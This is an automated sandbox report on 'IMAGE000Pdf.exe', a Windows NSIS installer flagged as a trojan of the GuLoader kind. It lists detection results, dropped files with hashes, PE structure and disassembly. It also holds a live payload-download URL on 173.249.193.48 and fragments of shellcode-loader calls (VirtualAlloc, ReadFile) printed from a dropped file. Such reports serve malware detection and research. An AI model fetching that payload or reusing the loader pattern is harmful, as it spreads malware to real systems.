      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      IMAGE000Pdf.exe13%ReversingLabsWin32.Trojan.NsisInject
      IMAGE000Pdf.exe100%AviraHEUR/AGEN.1333748
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nslBEDE.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin8v0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.binHI0%Avira URL Cloudsafe
      http://173.249.193.48/0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin8J0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.binlI/0%Avira URL Cloudsafe
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://173.249.193.48/VdpAwrpsFeHTHv196.binfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdIMAGE000Pdf.exe, 00000003.00000001.2444020022.00000000005F2000.00000008.00000001.01000000.00000008.sdmpfalse
        high
        http://173.249.193.48/VdpAwrpsFeHTHv196.binlI/IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.ftp.ftp://ftp.gopher.IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmpfalse
          high
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdIMAGE000Pdf.exe, 00000003.00000001.2444020022.00000000005F2000.00000008.00000001.01000000.00000008.sdmpfalse
            high
            http://nsis.sf.net/NSIS_ErrorErrorIMAGE000Pdf.exefalse
              high
              http://173.249.193.48/VdpAwrpsFeHTHv196.binHIIMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://173.249.193.48/VdpAwrpsFeHTHv196.bin8JIMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://173.249.193.48/IMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://173.249.193.48/VdpAwrpsFeHTHv196.bin8vIMAGE000Pdf.exe, 00000003.00000003.2923410565.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000003.2923595719.0000000004B64000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.2973809712.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214IMAGE000Pdf.exe, 00000003.00000001.2444020022.0000000000649000.00000008.00000001.01000000.00000008.sdmpfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                173.249.193.48
                unknownUnited States
                11878TZULOUSfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1548539
                Start date and time:2024-11-04 16:07:05 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 41s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:IMAGE000Pdf.exe
                Detection:MAL
                Classification:mal88.troj.evad.winEXE@3/11@0/1
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 52%
                • Number of executed functions: 30
                • Number of non-executed functions: 15
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: IMAGE000Pdf.exe
                TimeTypeDescription
                10:09:25API Interceptor3x Sleep call for process: IMAGE000Pdf.exe modified
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                TZULOUSBrneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 173.249.193.66
                Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 173.249.193.66
                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                • 173.249.236.72
                byte.arm5.elfGet hashmaliciousOkiruBrowse
                • 173.249.236.51
                https://tcmedcenter-my.sharepoint.com/:f:/g/personal/jessica_larson_tcmedcenter_org/Ek1X93Tsfp5KoiWqKbJ_ocQBqlE2wGVJqWkJh4H7mn0vuw?e=Yni2o7Get hashmaliciousUnknownBrowse
                • 173.249.199.16
                D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                • 173.249.236.64
                https://netorgft4648155-my.sharepoint.com/:f:/g/personal/cgriffith_nationsbest_net/ErhP9j6s6O5LtAYvSf-k7fgBJJeB0TUcEyK1gf2JqcFeEw?e=iS1Nd2Get hashmaliciousUnknownBrowse
                • 173.249.199.16
                http://www.multichainbridges.com/Get hashmaliciousUnknownBrowse
                • 198.54.132.29
                sora.arm.elfGet hashmaliciousMiraiBrowse
                • 173.249.236.58
                17247087656292f1fee39f411973c3f3722ee5485ed0d6445a4852bc2661fe5272ea752502946.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                • 173.249.196.110
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\nslBEDE.tmp\System.dllorders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                    8737738_19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      8737738_19082024.vbsGet hashmaliciousGuLoaderBrowse
                        Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                          Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                            89.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                              sahost.exeGet hashmaliciousGuLoaderBrowse
                                HSBC Advice_ACH_Credit_08082024 (1).xlsGet hashmaliciousGuLoaderBrowse
                                  sahost.exeGet hashmaliciousGuLoaderBrowse
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):52
                                    Entropy (8bit):4.0121618346445365
                                    Encrypted:false
                                    SSDEEP:3:BPi4YDgAmcAKDHMnhv:BPiBkAmc0nhv
                                    MD5:F298228D2D42CED0A00B0C5320000835
                                    SHA1:FB06F02DDCDA4C9EC752A688EE617064DB3A49EB
                                    SHA-256:E399AFE89F97EAE7BCDAE626913DA1618F4F42BA11887217CDBF524720532AB2
                                    SHA-512:464DA89F9E1D5935810443B20C3D19F77585D964DF89F5CB427482A03C8EF6274D06CBC01533D92C691FFD55E1725BA5F427D023A45A5128BCED0EEE11E083FE
                                    Malicious:false
                                    Reputation:low
                                    Preview:[skaaltalerens]..nonsaleability=sammenstuvningerne..
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):12288
                                    Entropy (8bit):5.737556724687435
                                    Encrypted:false
                                    SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                    MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                    SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                    SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                    SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: orders_PI 008-01.exe, Detection: malicious, Browse
                                    • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                    • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                    • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                    • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                    • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                    • Filename: 89.hta, Detection: malicious, Browse
                                    • Filename: sahost.exe, Detection: malicious, Browse
                                    • Filename: HSBC Advice_ACH_Credit_08082024 (1).xls, Detection: malicious, Browse
                                    • Filename: sahost.exe, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):589
                                    Entropy (8bit):4.277818373535095
                                    Encrypted:false
                                    SSDEEP:12:mScXAtJsdW8lLQIVVCTP1t0laiam6mObo/Bpqwnh2yKbdB1j1f:mSrTsdRTVVM9Yz69Hwh2yKb7ff
                                    MD5:E80E34F461528DF8F86C4248C971B2AD
                                    SHA1:A1A74D8F5711DEED35AF2B81BE070CA471C39500
                                    SHA-256:F2552D843F4D62F481743A15B7C95AA322C14EA5DBB999C8C889A42CBB093A8E
                                    SHA-512:46A5D6487131677DAC16C2BE4FC29517C14CB8DB6228B40344D733597462122EF0D1D7DD69B4D5A7A10F9C86635F99D91E91AC2CEBDF923C6B72EF3809637622
                                    Malicious:false
                                    Reputation:low
                                    Preview:pervalvar udvalgsarbejderne illegitime besully.trvarefabrikkers stemmeslugers binomialfordelingernes metropolit.mariolatrous griffy fiskeeksporten valutapuklerne spekulanter infusioners quantifys unconsolidation digitalises forvaltningsret..steticismens advents syde rebaptization returneredes chemosterilants agtvrdige,balklines sludres drengestregers topful koordinatvrdien angorakats tendensromanens blockheadish lidelsesfller eskapismes amiably phenicious nontenurial..overspringe udmntede agnostiker polycarpic stolper lbskes forhandlingsomraader acquires duskly kildnes gaultherase..
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):276701
                                    Entropy (8bit):1.2570216910370695
                                    Encrypted:false
                                    SSDEEP:768:yFPJSwGwS4JXi8PNDQNMDeMW3SGBqGHw1zwpmPMoaO64g1abi4IZxeMcdN9vfd95:/rFf4EoTti54LkFvI3oDW
                                    MD5:18C3DA2AA022FF0B89999E28E6A2AE9A
                                    SHA1:0659DDE0FD4B39B22825F1645A0BAE7E7202C7F9
                                    SHA-256:05DE1FF63CC38C7C4B3034091A311791BFF578658FF17D156AA4FB41A2E197C6
                                    SHA-512:D3A51D8B29FEF026F94B339087413319E03DA3193D9159A43AD7B4FEE35A67EEEBC3E66A0092B5ED14F57458173D518C618F2EE00F4203F428EBE0FC162F667C
                                    Malicious:false
                                    Reputation:low
                                    Preview:......................................................(.L.................................3........&.................."...........l........................s.....................................-...........................8..........@.........................................................h..................................@.........).........................I.................F..................................................................T..............................................................j..".......#I.............r.............&..................|...............................................................................:.Z......................).............................................................................H.......C...........................................................................................t.........................................................M.............4........'........................................}..+.......................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):313672
                                    Entropy (8bit):1.2567166720965932
                                    Encrypted:false
                                    SSDEEP:768:iEGLlMkjkYtwS3MeXM3OpckON5VIbjnI3Oif4NxZSqJbDvz+hE7IkHAYsaW3DQLF:LtWLdp3I3yrt+3SoTMU5oT5
                                    MD5:17B0342D31B6E728E13DF79009833371
                                    SHA1:B9F3354C4E886382D220D5EC4FA91F389585BD40
                                    SHA-256:8CAF84CE635BD92186709E81D12AE352E049C83B53F1C22A6DCB221E8F1C011E
                                    SHA-512:4772F5AE64E0619B23114A41785DDE7DD1A9BACE12A9ABEDEF3400EDB3660D4E780C9B91E23A9FDEC1D97BCF7DC48E201771D7D58EB1740191A05CCFDB433C83
                                    Malicious:false
                                    Reputation:low
                                    Preview:....................N............................k....................................................#.................................................................................`........0.............u...................................y................................................................g.........7................E.......&........w..............................................*....................<..................................3................i.......................................................................U...).................................................. ........................................................................................................................A..............................N......c.b.......................................................................................................N........T..............................................h..............................................................................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):207881
                                    Entropy (8bit):7.331635651026833
                                    Encrypted:false
                                    SSDEEP:3072:zDyy/gxfmTCBeuVaCzUVI90J8g5sF6963goPdEWduKiKMLUW3tTS4NrQsgT99BwE:zDyR4WDsCgVImsE77KMLUS44NMx
                                    MD5:749F30B7C897431F55057BFE15DF7228
                                    SHA1:2DB933559839DD5F79454546C98CCE8E9C4C8112
                                    SHA-256:1506167C68DEBF892BD0E2EAD9515C1F3F80BCCA9C489E715F2436425B7D8D48
                                    SHA-512:8E6BC090DFE67D411EA2B386538BAF9ADE1C7A47031CD4BFA0E7D491CFEF814923E71BA1DF8A2CB0A41AFADAE896F77BD89170BB560112E2A2B7BAA8DCD60C9D
                                    Malicious:false
                                    Preview:............ ..............EEEEE...............n..............C....F.......mm...........D..............ttt...--........``..:::....S....rrrr............P.O..6....".GG...............#.0.....................E..............22...~~.......aa............,..................................&..gg........77..LLLLLL.......ii.......0..o.ff..}.x... .99.....RR...............~~~~~.....................J......................kkk........E..........C...ee.........................G............J.............YY..~...2.............l........##.........Z.........(...........h.y........000.......yy...........l..lll...........................88...@@@@@.QQ..........^^...........mm...................CCC........KKKK.........2...............++..........V......-................B.........w................ ..............!!!....MM......66................===....................NNN..........S....??.........k........D.................................(............................. .........////....x.ccc.ZZ.w..====......
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16857
                                    Entropy (8bit):4.532822901243277
                                    Encrypted:false
                                    SSDEEP:384:+ipfHtyeVOvFfo92BAVO4tKq/vChYFVmuF1WbTeqFb7RfW:dlyttfo9iAVO4tiGmPZW
                                    MD5:143CC97C03735690BA675F029A4A3A16
                                    SHA1:7BBA23E28EDB92B05620AA4EA667D3C04DE93593
                                    SHA-256:EDCF653A613FF7FB1143DF97441A7027D486CA942A333F3EA0B74C7C11F3D88B
                                    SHA-512:01C2C26B31488E036F6C6634636B33A0C06672FF464549D12B653326FA1A90460FAF485C59D8F0B85C6CCF57946AC4D09A70B5A5D3609E93AD3DCDE421CF16A7
                                    Malicious:false
                                    Preview:.........UU..33........Z..nnnnnn....w.[..............EE................T.......................k..8e...r...n...e...l.N.3...2..M:...:.+.C...r..de...a...t...e...F.h.i...l...e...A...(...m... ...r...4... ...,... ...i... .&&0..cx...8...0...0...0...0...0...0...0...,..w ...i..w ...0...,... ...p... ...0...,... ...i... ...4...,... ...i... ..?0...x...8...0...,... .%%i... ...0...)...i.......r...8.......k...e...r...n...e...l._.3.~.2...:...:...S.**e...t..aF...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ..vi... ...2...3...0...1...2... ...,... ...i... ./.0...,...i... ...0...)...i.......r...4.......k...e...r...n...e...l...3...2.s.:...:...V...i...r...t...u...a...l...A...l...l...o..Nc...(...i..y ...0...,...i... ...5...4..B0...6...7...2..N0...0...,... .ddi..G ...0...x...3...0...0...0...,... ..Bi... ...0...x..v4...0...)...p...../.r...2.......k...e...r.}.n...e...l..B3...2..U:...:...R.+.e...a...d...F...i...l...e...(...i... ...r...8...,... ...i... ...r...2...,... ...i... ..^5...4...0...6
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244482
                                    Entropy (8bit):1.2509108197987615
                                    Encrypted:false
                                    SSDEEP:768:ArczTS8oocp0tWLSMkXWg7PKU30gfL4Qf1AUdyM03I3xkjFlu7NDSAZd+6XYIHXd:7Yhp0ckXv78owAC3MhxqI
                                    MD5:E6AC7A31DA2D4322339135AD20EB0F23
                                    SHA1:F76C6D6EE7C9B01DB799642990AA88B140003EC4
                                    SHA-256:00FAD7EC11DB9706955FDF3BE0E6FB037E9F9780F94A502A774B30AB52773A94
                                    SHA-512:C87DABB08D092D546FF80270B052CF1C5D92D25852DBFECC139CE528CCD2A22CCE130A8C90C08117DF542E6D83DE91E92180F853C201F042BED4681D4737E75D
                                    Malicious:false
                                    Preview:............................................w.........................................................................\.............................o.............q......................................]..........................I...............!...............................................m....... ............................................................................................h......K................=............................................................r..................................W....................................................................R......................................p..0...........................................................k.........k........................d........................................................................................................................9....................................#.....A........`...9...............P.......................................................................\...............
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):430713
                                    Entropy (8bit):1.2530301266200883
                                    Encrypted:false
                                    SSDEEP:1536:vu65sFtuGbUq4CCWG9TcLs9xEEc0MVWFnhMA:2PjbUquWUYs/9x
                                    MD5:8ED0D91C7C65B02A5630D1A012895C3D
                                    SHA1:FA74C3BD3A32123D71AEA67D386B5AC251FEC260
                                    SHA-256:1113E4990BEF55E4CD1D868513B2305C72803FB296D559BFA9C8C93DE2EDC8AB
                                    SHA-512:FBE41906CCABB44E8D71D7664B756F75ABDBF0FB80BFCBBF4BBA9D9370DF4CEDBE437BA9F116B3F9E9D2AE2FB1E2D34D34F152E518A2E5E0096A506093F8DB24
                                    Malicious:false
                                    Preview:..[.Z.....?............#......................................................0.....B..x....................................................Q.......Z......................I....j............{..........................................................................................................................................-.....7..............................M........9.U...........?...............................................................X..................../.....................t...............4................,........`........~..............d............................u............{.....................a.............................5.............{...g....Z.................H................l..........................S.............................................................................................................................J...........................................U............................x.....f.............D..../....o........................QLi...
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):223405
                                    Entropy (8bit):1.2642457624863013
                                    Encrypted:false
                                    SSDEEP:768:DDh04DrooyUGbNSipoS0yYEt0ihBLBJU06zf8VWZt+il3sVxTD6I6o9+2u5inuB4:rorpFGQVWwj9bQdun2ljrAbUGl
                                    MD5:96E6C0CBBACF232110DF3E7FC4B4D980
                                    SHA1:FC18FDD4E5417AC76F68BF507AC0BA6B9A183CFE
                                    SHA-256:04F64748055424253509A229EE3E6F9BFC86898CBA667DA8312333552987B610
                                    SHA-512:8DD22ABBED1522A08E9AC3559F5CC6871B77C1B76C2A7AA0CD61E52CA7D3A43DCBAF00285BF29C1FF885FC5F424FA411F56F19EB1886DA97CC7010BCA66530A9
                                    Malicious:false
                                    Preview:....................................{............!.............Q.............................................................................:...........z..................................W.......................... ......................................3...........y...............j................!n...............................................................................3........................+.......................a.......................c........................................)............................................................................................................................?.............................................................................................S....../.....................................................6./...t..+.......................H............{..........&................................b............................R.......x....=..................V....]........>...................................m................0.....
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 175-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8.000000
                                    Category:dropped
                                    Size (bytes):385914
                                    Entropy (8bit):1.2561626561864936
                                    Encrypted:false
                                    SSDEEP:768:++TtgE2yMxqLKoiyt4CpVdIwu3Uema6LhlEv9cCAXP69rBqGDpx/NEJKTPLqqQJl:bMFgNCAE6oLJS9a/IrOyTWq2uC
                                    MD5:A4946227DE4DC2A79BF473A3D09C4247
                                    SHA1:9FF800E6B4A72B6281D812710D00AD003F757170
                                    SHA-256:1F6BB50C9AC95A61782FCDE006B6E396ACEDA7794FD30FFB7D97020FD7B8059E
                                    SHA-512:2902630584092375E1A2FB4669437C43548BC0D0E00B2B98A3FDAEEDC57F3567B61A3FC545C8157FD410D6E26C9A70E8D989E97983700FFB55D9D1154CEBE1F4
                                    Malicious:false
                                    Preview:..................................................#..................................._............................{.........................P................$.............................................................................................}............&................g.........................................A................................................K................................................Z..............-......5.........................................................e.......d..........................................L...............0......C................).................................................................................r............Q..2........................9................(...............................................t......................................................................>.....b..8.....................n.............]..................F.....................................U...................................S.........
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):6.460432078632097
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:IMAGE000Pdf.exe
                                    File size:915'632 bytes
                                    MD5:53441f2de2d573f3b2e4fb35c248229b
                                    SHA1:afc840f25adfcb5873f5b69e55b2920c370a2285
                                    SHA256:5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
                                    SHA512:021ba2fc3570b82daf0181f229e5e0b80a10f6a74a3f77baa4d608961c38222b03d428f82b7d5abfca6fa55cbfebc7b5e715f33ecf8f67882186b6601bfcbda2
                                    SSDEEP:12288:A3nIRS5/vuI8sOabBdHdWIXjwxipfpQGYAGau5yxX9O9u:A3IRgvuoO0pdZXjUiNuGYpawA9uu
                                    TLSH:59156949A38C50C6DD3A3B32FA1D7613B655AC138550118A3AC8BE583BF57B07B9FA31
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                    Icon Hash:d3672eac1a0c662c
                                    Entrypoint:0x4034a2
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                    Signature Valid:false
                                    Signature Issuer:CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 25/01/2024 10:16:23 24/01/2027 10:16:23
                                    Subject Chain
                                    • CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
                                    Version:3
                                    Thumbprint MD5:B7699D9FC11FF2BC8B537A1496DBA607
                                    Thumbprint SHA-1:13E2B15CFFB46BFE6E63F1DDDD5D08B90EC97D8B
                                    Thumbprint SHA-256:B488D28F491B0130739761D68A25298DFD95A7D90A466B370C1D833271156981
                                    Serial:0C38DED2C7C23BE59C80206BBCC81E7BF88A1876
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push esi
                                    push edi
                                    push 00000020h
                                    pop edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+14h], ebx
                                    mov dword ptr [esp+10h], 0040A2E0h
                                    mov dword ptr [esp+1Ch], ebx
                                    call dword ptr [004080CCh]
                                    call dword ptr [004080D0h]
                                    and eax, BFFFFFFFh
                                    cmp ax, 00000006h
                                    mov dword ptr [007A8A6Ch], eax
                                    je 00007F17ACECEA63h
                                    push ebx
                                    call 00007F17ACED1D51h
                                    cmp eax, ebx
                                    je 00007F17ACECEA59h
                                    push 00000C00h
                                    call eax
                                    mov esi, 004082B0h
                                    push esi
                                    call 00007F17ACED1CCBh
                                    push esi
                                    call dword ptr [00408154h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], 00000000h
                                    jne 00007F17ACECEA3Ch
                                    push 0000000Bh
                                    call 00007F17ACED1D24h
                                    push 00000009h
                                    call 00007F17ACED1D1Dh
                                    push 00000007h
                                    mov dword ptr [007A8A64h], eax
                                    call 00007F17ACED1D11h
                                    cmp eax, ebx
                                    je 00007F17ACECEA61h
                                    push 0000001Eh
                                    call eax
                                    test eax, eax
                                    je 00007F17ACECEA59h
                                    or byte ptr [007A8A6Fh], 00000040h
                                    push ebp
                                    call dword ptr [00408038h]
                                    push ebx
                                    call dword ptr [00408298h]
                                    mov dword ptr [007A8B38h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 000002B4h
                                    push eax
                                    push ebx
                                    push 0079FF08h
                                    call dword ptr [0040818Ch]
                                    push 0040A2C8h
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3de0000x56ef8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xdef900x920.data
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x3a90000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
